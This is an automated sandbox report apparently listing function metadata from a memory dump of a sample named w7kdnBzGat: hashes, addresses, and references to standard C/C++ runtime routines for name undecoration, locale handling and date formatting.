Opcode ID: 3d9fb71b9a8c4f5850e043095178f0b06b91ffed8a18884ade8fe223d7ecf91d
Instruction ID: 6d51a256c8e25596ff33ad3e488a34a0cce2d0a4d84603a8de65dfd39235e5f3
Opcode Fuzzy Hash: 3d9fb71b9a8c4f5850e043095178f0b06b91ffed8a18884ade8fe223d7ecf91d
Instruction Fuzzy Hash: 8FE08235501208EFCB00CFA8C048E8EBBF8FB88384F1048A0E004D3290E234EF80DA00

Function 004FFD5B Relevance: .0, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2301187e0460f6a1cace2849ffeb047e39ebdefd6facb4954a01533ee812fc6
Instruction ID: 69df188529517ca7ded5e54f374fae1c9043465a877b4bf9dddfdc04ecdc6aac
Opcode Fuzzy Hash: b2301187e0460f6a1cace2849ffeb047e39ebdefd6facb4954a01533ee812fc6
Instruction Fuzzy Hash: 56C01235000D0447CE2D891082713BA3768EB927C6F8004EED6030A7A2C61E9C8ADA00

Function 004D3E34 Relevance: 33.6, APIs: 13, Strings: 6, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 004D3E9F
DName::operator+.LIBCMT ref: 004D3FE2

Part of subcall function 004CF7BA: shared_ptr.LIBCMT ref: 004CF7D6

DName::operator+.LIBCMT ref: 004D3F8D
DName::operator+.LIBCMT ref: 004D402E
DName::operator+.LIBCMT ref: 004D403D
DName::operator+.LIBCMT ref: 004D4169
DName::operator=.LIBVCRUNTIME ref: 004D41A9
DName::DName.LIBVCRUNTIME ref: 004D41B3
DName::operator+.LIBCMT ref: 004D41D0
DName::operator+.LIBCMT ref: 004D41DC

Part of subcall function 004D56F4: Replicator::operator[].LIBCMT ref: 004D5731

Strings

?BM, xrefs: 004D3F7F, 004D3FC2
D_R, xrefs: 004D41BB
$_R, xrefs: 004D40EE
D_R, xrefs: 004D3F6C
D_R, xrefs: 004D3E81
?BM, xrefs: 004D3E3F, 004D3E98, 004D3EB3, 004D4033, 004D4075, 004D4108, 004D4165, 004D41D5

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]shared_ptr
String ID: $_R$?BM$?BM$D_R$D_R$D_R
API String ID: 1043660730-3165570551
Opcode ID: ab2de8bbb8e35433b798ce51dcd6366aaeae3e0f6d673a607808a06ed41c5472
Instruction ID: b22c4b2761340607961791b0a1c9c8f228fb36af344cebc6ed59142947593169
Opcode Fuzzy Hash: ab2de8bbb8e35433b798ce51dcd6366aaeae3e0f6d673a607808a06ed41c5472
Instruction Fuzzy Hash: 8CC1E2759002089FDB24CFA4D869FEEBBF9AF55305F14406FE14AA7381DB389A48CB44

Function 004BA914 Relevance: 27.4, APIs: 18, Instructions: 433COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004BA91B
ctype.LIBCPMT ref: 004BA962

Part of subcall function 004B9F94: __Getctype.LIBCPMT ref: 004B9FA3

Part of subcall function 004B4F9C: __EH_prolog3.LIBCMT ref: 004B4FA3
Part of subcall function 004B4F9C: std::_Lockit::_Lockit.LIBCPMT ref: 004B4FAD
Part of subcall function 004B4F9C: int.LIBCPMT ref: 004B4FC4

Part of subcall function 004B50C6: __EH_prolog3.LIBCMT ref: 004B50CD
Part of subcall function 004B50C6: std::_Lockit::_Lockit.LIBCPMT ref: 004B50D7
Part of subcall function 004B50C6: int.LIBCPMT ref: 004B50EE

Part of subcall function 004B5285: __EH_prolog3.LIBCMT ref: 004B528C
Part of subcall function 004B5285: std::_Lockit::_Lockit.LIBCPMT ref: 004B5296
Part of subcall function 004B5285: int.LIBCPMT ref: 004B52AD
Part of subcall function 004B5285: std::_Lockit::~_Lockit.LIBCPMT ref: 004B5307

Part of subcall function 004B51F0: __EH_prolog3.LIBCMT ref: 004B51F7
Part of subcall function 004B51F0: std::_Lockit::_Lockit.LIBCPMT ref: 004B5201
Part of subcall function 004B51F0: int.LIBCPMT ref: 004B5218

Part of subcall function 004A8DD4: __EH_prolog3.LIBCMT ref: 004A8DDB
Part of subcall function 004A8DD4: std::_Lockit::_Lockit.LIBCPMT ref: 004A8DE5
Part of subcall function 004A8DD4: std::_Lockit::~_Lockit.LIBCPMT ref: 004A8E8C

int.LIBCPMT ref: 004BAB18
int.LIBCPMT ref: 004BAB72
int.LIBCPMT ref: 004BABB5
int.LIBCPMT ref: 004BABF8
int.LIBCPMT ref: 004BAC64
int.LIBCPMT ref: 004BACE9
numpunct.LIBCPMT ref: 004BAD10

Part of subcall function 004B6024: __EH_prolog3.LIBCMT ref: 004B602B

Part of subcall function 004B57C2: __EH_prolog3.LIBCMT ref: 004B57C9
Part of subcall function 004B57C2: std::_Lockit::_Lockit.LIBCPMT ref: 004B57D3
Part of subcall function 004B57C2: int.LIBCPMT ref: 004B57EA
Part of subcall function 004B57C2: std::_Lockit::~_Lockit.LIBCPMT ref: 004B5844

Part of subcall function 004B58EC: __EH_prolog3.LIBCMT ref: 004B58F3
Part of subcall function 004B58EC: std::_Lockit::_Lockit.LIBCPMT ref: 004B58FD
Part of subcall function 004B58EC: int.LIBCPMT ref: 004B5914
Part of subcall function 004B58EC: std::_Lockit::~_Lockit.LIBCPMT ref: 004B596E

Part of subcall function 004A8DD4: Concurrency::cancel_current_task.LIBCPMT ref: 004A8E97

Part of subcall function 004B4AF4: __EH_prolog3.LIBCMT ref: 004B4AFB
Part of subcall function 004B4AF4: std::_Lockit::_Lockit.LIBCPMT ref: 004B4B05
Part of subcall function 004B4AF4: int.LIBCPMT ref: 004B4B1C
Part of subcall function 004B4AF4: std::_Lockit::~_Lockit.LIBCPMT ref: 004B4B76

int.LIBCPMT ref: 004BAD39
int.LIBCPMT ref: 004BA937

Part of subcall function 004A3725: std::_Lockit::_Lockit.LIBCPMT ref: 004A3736
Part of subcall function 004A3725: std::_Lockit::~_Lockit.LIBCPMT ref: 004A3750

int.LIBCPMT ref: 004BA9A1
int.LIBCPMT ref: 004BA9E7
int.LIBCPMT ref: 004BAA2A
int.LIBCPMT ref: 004BAAB0
__Getcoll.LIBCPMT ref: 004BAAD6
int.LIBCPMT ref: 004BADA1
codecvt.LIBCPMT ref: 004BADC1

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$H_prolog3$Lockit::_$Lockit::~_$Concurrency::cancel_current_taskGetcollGetctypecodecvtctypenumpunct
String ID:
API String ID: 778957219-0
Opcode ID: 232ee6273ec3febda97c87fd5ccd2a195b61b7836c6cf35111547499bd4cd4b7
Instruction ID: 6d5c9caed18a136e0d2a362a14b70926d6cae5db3d0613ffb1a93aab1c1e0ebd
Opcode Fuzzy Hash: 232ee6273ec3febda97c87fd5ccd2a195b61b7836c6cf35111547499bd4cd4b7
Instruction Fuzzy Hash: 3FE105718006159BDB11AF658C42ABFBEB5FF52364F10441FFA545B381EB388D2097BA

Function 004BADF0 Relevance: 27.4, APIs: 18, Instructions: 433COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004BADF7
ctype.LIBCPMT ref: 004BAE3E

Part of subcall function 004B9FCD: __Getctype.LIBCPMT ref: 004B9FDC

Part of subcall function 004B5031: __EH_prolog3.LIBCMT ref: 004B5038
Part of subcall function 004B5031: std::_Lockit::_Lockit.LIBCPMT ref: 004B5042
Part of subcall function 004B5031: int.LIBCPMT ref: 004B5059

Part of subcall function 004B515B: __EH_prolog3.LIBCMT ref: 004B5162
Part of subcall function 004B515B: std::_Lockit::_Lockit.LIBCPMT ref: 004B516C
Part of subcall function 004B515B: int.LIBCPMT ref: 004B5183

Part of subcall function 004B53AF: __EH_prolog3.LIBCMT ref: 004B53B6
Part of subcall function 004B53AF: std::_Lockit::_Lockit.LIBCPMT ref: 004B53C0
Part of subcall function 004B53AF: int.LIBCPMT ref: 004B53D7
Part of subcall function 004B53AF: std::_Lockit::~_Lockit.LIBCPMT ref: 004B5431

Part of subcall function 004B531A: __EH_prolog3.LIBCMT ref: 004B5321
Part of subcall function 004B531A: std::_Lockit::_Lockit.LIBCPMT ref: 004B532B
Part of subcall function 004B531A: int.LIBCPMT ref: 004B5342
Part of subcall function 004B531A: std::_Lockit::~_Lockit.LIBCPMT ref: 004B539C

Part of subcall function 004A8DD4: __EH_prolog3.LIBCMT ref: 004A8DDB
Part of subcall function 004A8DD4: std::_Lockit::_Lockit.LIBCPMT ref: 004A8DE5
Part of subcall function 004A8DD4: std::_Lockit::~_Lockit.LIBCPMT ref: 004A8E8C

int.LIBCPMT ref: 004BAFF4
int.LIBCPMT ref: 004BB04E
int.LIBCPMT ref: 004BB091
int.LIBCPMT ref: 004BB0D4
int.LIBCPMT ref: 004BB140
int.LIBCPMT ref: 004BB1C5
numpunct.LIBCPMT ref: 004BB1EC

Part of subcall function 004B6057: __EH_prolog3.LIBCMT ref: 004B605E

Part of subcall function 004B5857: __EH_prolog3.LIBCMT ref: 004B585E
Part of subcall function 004B5857: std::_Lockit::_Lockit.LIBCPMT ref: 004B5868
Part of subcall function 004B5857: int.LIBCPMT ref: 004B587F
Part of subcall function 004B5857: std::_Lockit::~_Lockit.LIBCPMT ref: 004B58D9

Part of subcall function 004B5981: __EH_prolog3.LIBCMT ref: 004B5988
Part of subcall function 004B5981: std::_Lockit::_Lockit.LIBCPMT ref: 004B5992
Part of subcall function 004B5981: int.LIBCPMT ref: 004B59A9
Part of subcall function 004B5981: std::_Lockit::~_Lockit.LIBCPMT ref: 004B5A03

Part of subcall function 004A8DD4: Concurrency::cancel_current_task.LIBCPMT ref: 004A8E97

Part of subcall function 004B4B89: __EH_prolog3.LIBCMT ref: 004B4B90
Part of subcall function 004B4B89: std::_Lockit::_Lockit.LIBCPMT ref: 004B4B9A
Part of subcall function 004B4B89: int.LIBCPMT ref: 004B4BB1
Part of subcall function 004B4B89: std::_Lockit::~_Lockit.LIBCPMT ref: 004B4C0B

int.LIBCPMT ref: 004BB215
int.LIBCPMT ref: 004BAE13

Part of subcall function 004A3725: std::_Lockit::_Lockit.LIBCPMT ref: 004A3736
Part of subcall function 004A3725: std::_Lockit::~_Lockit.LIBCPMT ref: 004A3750

int.LIBCPMT ref: 004BAE7D
int.LIBCPMT ref: 004BAEC3
int.LIBCPMT ref: 004BAF06
int.LIBCPMT ref: 004BAF8C
__Getcoll.LIBCPMT ref: 004BAFB2
int.LIBCPMT ref: 004BB27D
codecvt.LIBCPMT ref: 004BB29D

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$H_prolog3$Lockit::_$Lockit::~_$Concurrency::cancel_current_taskGetcollGetctypecodecvtctypenumpunct
String ID:
API String ID: 778957219-0
Opcode ID: e548b409860b25659656a732c6ec2824ab86841eb25815d52ad7a77d3adc00d0
Instruction ID: dca81193ac801fcd2fef1ae945c8deed545ae2b178dfd0b7487f89f144f16bd7
Opcode Fuzzy Hash: e548b409860b25659656a732c6ec2824ab86841eb25815d52ad7a77d3adc00d0
Instruction Fuzzy Hash: 80E107718002159BEB11AF668C42AFFBEA5FF52364F10441FF9545B381EB7C8D109BAA

Function 004D283C Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 332COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 004D2905
DName::operator+.LIBCMT ref: 004D2942
DName::DName.LIBVCRUNTIME ref: 004D2956
DName::operator+.LIBCMT ref: 004D2965
DName::operator+.LIBCMT ref: 004D29F3
DName::DName.LIBVCRUNTIME ref: 004D2A1B
DName::operator+.LIBCMT ref: 004D2A29
DName::operator+.LIBCMT ref: 004D2A63
DName::operator+.LIBCMT ref: 004D2AA4
UnDecorator::getReturnType.LIBCMT ref: 004D2AD4
operator+.LIBVCRUNTIME ref: 004D2BD6

Strings

D_R, xrefs: 004D28E4
]9M, xrefs: 004D2B1A, 004D2A0C

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: Name::operator+$NameName::$Decorator::getReturnTypeoperator+
String ID: D_R$]9M
API String ID: 2932655852-3758005632
Opcode ID: 5e25c3fc4174fd31215d5a2a987990ba6d7a66fdcb13092c965eab1aa52c7e74
Instruction ID: 33dbe2f76aec88dff296f06e1cef02d9a0d32835f2b5513cec4ca9402fd68d68
Opcode Fuzzy Hash: 5e25c3fc4174fd31215d5a2a987990ba6d7a66fdcb13092c965eab1aa52c7e74
Instruction Fuzzy Hash: 8AC1D675900208AFDB14DFA4D9A5EEE77B5EF24304F04406FF106A7391DBB89A49CB68

Function 004D0ECF Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 359COMMONLIBRARYCODE

Download Yara Rule

APIs

shared_ptr.LIBCMT ref: 004D0F42
shared_ptr.LIBCMT ref: 004D0F8A
shared_ptr.LIBCMT ref: 004D0FA9
operator+.LIBVCRUNTIME ref: 004D10D7
DName::operator=.LIBVCRUNTIME ref: 004D10E9
shared_ptr.LIBCMT ref: 004D132E
DName::operator+.LIBCMT ref: 004D1370
operator+.LIBVCRUNTIME ref: 004D13B6

Strings

xbR, xrefs: 004D1327
0bR, xrefs: 004D113B

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: shared_ptr$operator+$Name::operator+Name::operator=
String ID: 0bR$xbR
API String ID: 1464150960-2638799279
Opcode ID: 0089e7044b978d8baeeb436caacb2edfbef26208980b2da264c5169f373c1e61
Instruction ID: ed215f34a2b9f60a4857d748b74ad86567a97c1aaae929b844bfef6b3cc7c674
Opcode Fuzzy Hash: 0089e7044b978d8baeeb436caacb2edfbef26208980b2da264c5169f373c1e61
Instruction Fuzzy Hash: B8E19AB5C00209EADB04DF95D4A8AFEBBB4BF09304F10815BD912A77A1D37C5A49CF99

Function 004D493B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 297COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 004D4A11
UnDecorator::getSignedDimension.LIBCMT ref: 004D4A1C
UnDecorator::getSignedDimension.LIBCMT ref: 004D4B08
UnDecorator::getSignedDimension.LIBCMT ref: 004D4B25
UnDecorator::getSignedDimension.LIBCMT ref: 004D4B42
DName::operator+.LIBCMT ref: 004D4B57
UnDecorator::getSignedDimension.LIBCMT ref: 004D4B71
swprintf.LIBCMT ref: 004D4BEB
DName::operator+.LIBCMT ref: 004D4C46

Part of subcall function 004D08F4: DName::DName.LIBVCRUNTIME ref: 004D0952

DName::DName.LIBVCRUNTIME ref: 004D4CBD

Strings

0`R, xrefs: 004D4CA6

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: Decorator::getDimensionSigned$Name::operator+$NameName::$swprintf
String ID: 0`R
API String ID: 3689813335-1001547773
Opcode ID: a5093b22f6315fe07be9f9288f04aa82273c0da7d12df6532d06c9c622443951
Instruction ID: 2f6c1e4ed04d6cb1fe4b92ff2f04d5ef21e51ba3afaae880f806ee33e38d60e9
Opcode Fuzzy Hash: a5093b22f6315fe07be9f9288f04aa82273c0da7d12df6532d06c9c622443951
Instruction Fuzzy Hash: E891C7B1D002099BDB14EBB5D97ABBF7778AB84304F10402FF102A6791DB7C9A099B5D

Function 004D56F4 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 185COMMONLIBRARYCODE

Download Yara Rule

APIs

Replicator::operator[].LIBCMT ref: 004D5731

Strings

\_R, xrefs: 004D57A2
template-parameter-, xrefs: 004D5790
generic-type-, xrefs: 004D57B7
@, xrefs: 004D589D

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: Replicator::operator[]
String ID: @$\_R$generic-type-$template-parameter-
API String ID: 3676697650-2492209736
Opcode ID: 1a0a01e8ca3a39cf2692ffa706880632c0e2e0aa510483a030d4d1a7991b3a14
Instruction ID: 23ac1bb37f01ce77df434b690a21e80287d6e63633ed07fc38632943ad9281ce
Opcode Fuzzy Hash: 1a0a01e8ca3a39cf2692ffa706880632c0e2e0aa510483a030d4d1a7991b3a14
Instruction Fuzzy Hash: 8A61D371D006099FEB10DFA5D865BEEBBB8AF18304F14402FE501A7391EB789909DF98

Function 004C4D5D Relevance: 16.8, APIs: 11, Instructions: 277COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004C4D64

Part of subcall function 004C39EA: __EH_prolog3_GS.LIBCMT ref: 004C39F1
Part of subcall function 004C39EA: __Getcoll.LIBCPMT ref: 004C3A55

__Getcoll.LIBCPMT ref: 004C4DB3

Part of subcall function 004C353B: __EH_prolog3.LIBCMT ref: 004C3542
Part of subcall function 004C353B: std::_Lockit::_Lockit.LIBCPMT ref: 004C354C
Part of subcall function 004C353B: int.LIBCPMT ref: 004C3563
Part of subcall function 004C353B: std::_Lockit::~_Lockit.LIBCPMT ref: 004C35BD

Part of subcall function 004A8DD4: __EH_prolog3.LIBCMT ref: 004A8DDB
Part of subcall function 004A8DD4: std::_Lockit::_Lockit.LIBCPMT ref: 004A8DE5
Part of subcall function 004A8DD4: std::_Lockit::~_Lockit.LIBCPMT ref: 004A8E8C

int.LIBCPMT ref: 004C4D8D

Part of subcall function 004A3725: std::_Lockit::_Lockit.LIBCPMT ref: 004A3736
Part of subcall function 004A3725: std::_Lockit::~_Lockit.LIBCPMT ref: 004A3750

int.LIBCPMT ref: 004C4DF1
int.LIBCPMT ref: 004C4E47
int.LIBCPMT ref: 004C4E8C
int.LIBCPMT ref: 004C4ECF
int.LIBCPMT ref: 004C4F3B
int.LIBCPMT ref: 004C4FBC
numpunct.LIBCPMT ref: 004C4FE3
int.LIBCPMT ref: 004C500B

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$H_prolog3Lockit::_Lockit::~_$Getcoll$H_prolog3_numpunct
String ID:
API String ID: 3873313002-0
Opcode ID: d04c4176b83b3443770c6ac1b6975b9b7384e09372a7998a8ab2bb4634c5e390
Instruction ID: 0f091fa18d3ccd911e26ff415ad838dd86c8631820c00c669f66c9272bcc7049
Opcode Fuzzy Hash: d04c4176b83b3443770c6ac1b6975b9b7384e09372a7998a8ab2bb4634c5e390
Instruction Fuzzy Hash: 439107B98016115BD7A1AF728911F7FBAE4FFA1365F11841FF90557281EF3C8A0087AA

Function 00503408 Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 487COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 005037E0

Strings

p, xrefs: 00503521
f, xrefs: 00503560
:, xrefs: 005034D3
p, xrefs: 00503567
p, xrefs: 00503505
f, xrefs: 005034FE
f, xrefs: 0050351A

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: __aulldiv
String ID: :$f$f$f$p$p$p
API String ID: 3732870572-1434680307
Opcode ID: b59f30325f2dedd2650b667c50e83f027b91bb992b405dd9a036f94543c9f176
Instruction ID: b72d8531e9dbde49b8bba020d23c105450e8bcf413a75751d8011b218ba6e2ee
Opcode Fuzzy Hash: b59f30325f2dedd2650b667c50e83f027b91bb992b405dd9a036f94543c9f176
Instruction Fuzzy Hash: 600290B9A00209DADF248FA5C4496EDBF7AFF40B14F644919E8557B2C2D3708F88CB54

Function 004BE33D Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 351COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004BE344

Part of subcall function 004B4D48: __EH_prolog3.LIBCMT ref: 004B4D4F
Part of subcall function 004B4D48: std::_Lockit::_Lockit.LIBCPMT ref: 004B4D59
Part of subcall function 004B4D48: int.LIBCPMT ref: 004B4D70

Strings

%b %d %H : %M : %S %Y, xrefs: 004BE5FC
:AM:am:PM:pm, xrefs: 004BE6D9
%H : %M, xrefs: 004BE489
%m / %d / %y, xrefs: 004BE440
%I : %M : %S %p, xrefs: 004BE6CE
%H : %M : %S, xrefs: 004BE500
%d / %m / %y, xrefs: 004BE6A7

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: H_prolog3$LockitLockit::_std::_
String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
API String ID: 2181796688-2891247106
Opcode ID: 41b4b42312fc0b6e0a2884e8ebfcea60861af2ce3313841d0b4e9b26f0e6cd29
Instruction ID: d3a7cc1719aadafcd8c15258923e17858ef3e1b7ee3f777a79395bb36abffc03
Opcode Fuzzy Hash: 41b4b42312fc0b6e0a2884e8ebfcea60861af2ce3313841d0b4e9b26f0e6cd29
Instruction Fuzzy Hash: CBC19F76500109ABDF28DFA9C999DFF3BA8BF95304F14451BFA02A2251E634DA10CB79

Function 004BE72D Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 351COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004BE734

Part of subcall function 004B4DDD: __EH_prolog3.LIBCMT ref: 004B4DE4
Part of subcall function 004B4DDD: std::_Lockit::_Lockit.LIBCPMT ref: 004B4DEE
Part of subcall function 004B4DDD: int.LIBCPMT ref: 004B4E05

Strings

%b %d %H : %M : %S %Y, xrefs: 004BE9EC
:AM:am:PM:pm, xrefs: 004BEAC9
%H : %M, xrefs: 004BE879
%m / %d / %y, xrefs: 004BE830
%I : %M : %S %p, xrefs: 004BEABE
%H : %M : %S, xrefs: 004BE8F0
%d / %m / %y, xrefs: 004BEA97

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
